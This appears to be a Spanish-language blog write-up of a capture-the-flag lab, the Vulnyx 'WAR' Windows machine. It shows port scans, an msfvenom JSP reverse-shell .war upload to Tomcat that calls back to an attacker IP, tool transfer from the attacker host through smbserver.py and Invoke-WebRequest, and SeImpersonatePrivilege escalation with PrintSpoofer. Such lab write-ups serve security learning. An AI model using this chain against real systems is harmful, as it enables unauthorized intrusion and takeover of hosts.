Post

WAR, Vulnyx

portada

Herramientas y recursos

En este reto de la plataforma Vulnyx voy a empezar a aprender a explotar maquinas windows y esta es la maquina war.

Tecnicas Herramientas
scan de puertos nmap
msfvenom crear payload
tomcat upload .war
SeImpersonatePrivilege printspoofer.exe
transferenciua de archivos smbserver.py

Reconocimiento y enumeracion

Lo primero tratamos de averiguar que ip se le asigno y si tenemos conectividad.

conectividad

Vemos que la ip es la 192.168.0.106 la reconocemos pq la mac de virtualvbox siempre empieza en 08:00.

Lo primero que voy a realizar es ver que puertos tiene abiertos y al tratarse de una windows y pese a ser mas lento le lanzo un escano tcp y udp en los 200 puertos mas usados.

1
sudo nmap -sS -sU -T4 -Pn --top-ports 200 -n 192.168.0.106 -vvv

Ahora que sabemos que puertos tenemos abiertos nos encofocamos en ellos y extraemos versiones y servicios

  • 135:msrpc
  • 139:netbios
  • 445:samba
  • 8080:http-proxy
  • 137: UDP netbios
1
sudo nmap -sSCV -T4 -Pn -p135,139,445,8080 -n 192.168.0.106 -vvv

nmap

Como vemos hay varias cositas que deberiamos de probar enumeracion de samba la web en el 8080 etc … como vengo de hacer muchas otras maquinas linux y muchas de ellas tienen la primera intrusion por web voy a tirar por ahi a ver que onda y dado que nmap nos da la version vamos a tratar de buscar exploits etc….

Despues de acosdtumbrarme veo que hay seccion que permite subir ficheros ,lo que conocia hasta ahora no me funciono pero me acorde de metasploit/msfconsole/msfvenom asi busque un payload en java para mandarme una revshell. Creo que lo unico que sube correctamente son ficheros .war que deben tener una estructura determinda al estilo de cualquier modulo en un cms convencional, asi que paso a crear el payload con msfvenom.

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.104 LPORT=8889 -f war -o revshell.war

Una vez creada solo debemos subirla para ello vamosa a la web y seleccionamos el archivo recien creado y le damos a desplegar , antes de entrar a la nueva webapp por asi llamarla nos ponemos a la escucha.

1
nc -lnvp 8889

Ahora ya nos podemos volver a la web y entrar a la aplicacion recien subida y recibirimos nuestra ansiada revshell.

nc

A esta altura hubiese estado mejor ponerse en escucha con msfconsole para mejorar la terminal y abrir un meterpreter.(desconozco si es posible por ahora)

Intrusion y escalada.

Imagino que como siempre sera comprobar quien soy que permisos tengo donde puedo escribir etc.

1
whoami /all
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

La verdad me desconcierta un huevo esto de windows yo esperaba solo los usarios pero me ha escupido un huevo de info , incluso de privilegios, asi que busco que me dice san google sobre los tres que estan activados.

  • SeChangeNotifyPrivilege : Creo que deberiamos de poder escalar tambien a traves de eset pero yo no lo consegui , en principio y si no entendi mal se podria explotar para a traves de un script en ps1 poder activar otros vectores de ataque que inicialmente estan desactivados.

  • SeImpersonatePrivilege : Este es el que veo prometedor en esta maquina y del que mas info he encontrado asi que vamos a probar.

Escalada

Descragamos y transferimos el binario que usaremos para la explotacion.Yo voy a probar dos binarios distintos primero el JuicyPotatoNG.exe y posteriormente el PrintSpoofer.exe. En este punto me vuelto un poco loco pq no conseguia trasnferirme los ficheros el Invoke-WebRequest -Uri http://192.168.0.104:8088/PrintSpoofer64.exe -OutFile C:\Users\Public\printspoofer.exe no me andaba , asi que googlear.

La solucion fue hacer uso de una herramienta que viene incluida en impacket smbserver.py la cual se encarga de montar un server rapido de samba para poder tranferirnos los archivos , que mal he hecho en no abrirme una meterpreter , con un simple upload para adelante.

Bueno a lio levantamos el server y descragamos los ficheros , no sin antes menearnos a una ruta donde tengamos acceso.

1
2
3
cd %TEMP% #maquina windoiws
sudo smbserver.py a . -smb2support # atacante
copy \\192.168.0.104\a\JuicyPotatoNG.exe potato.exe #Windows

transfer

Con los ficheros en la maquina victima pasamos a ejecutarlo.Como lei que a veces fallan probe esos dos aunque hay mas para este tipo de escalada , en este caso el JuicyPotatoNG no funciono , pero si el PrintSpoofer64.exe

1
2
potato.exe -t * -p "C:\windows\system32\cmd.exe" #Creo que fallo porque no me aclare con los argumentos del comando
print.exe -i -c cmd # sin problemas

root

Se me hacen muy raras estas maquinas windows pero en entornos empresiales es lo que usan, de momento, asi que a aparender, compartir y disfrutar.

Muchas gracias poor leerme, espero que te haya gustado y que te sirva de ayuda.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.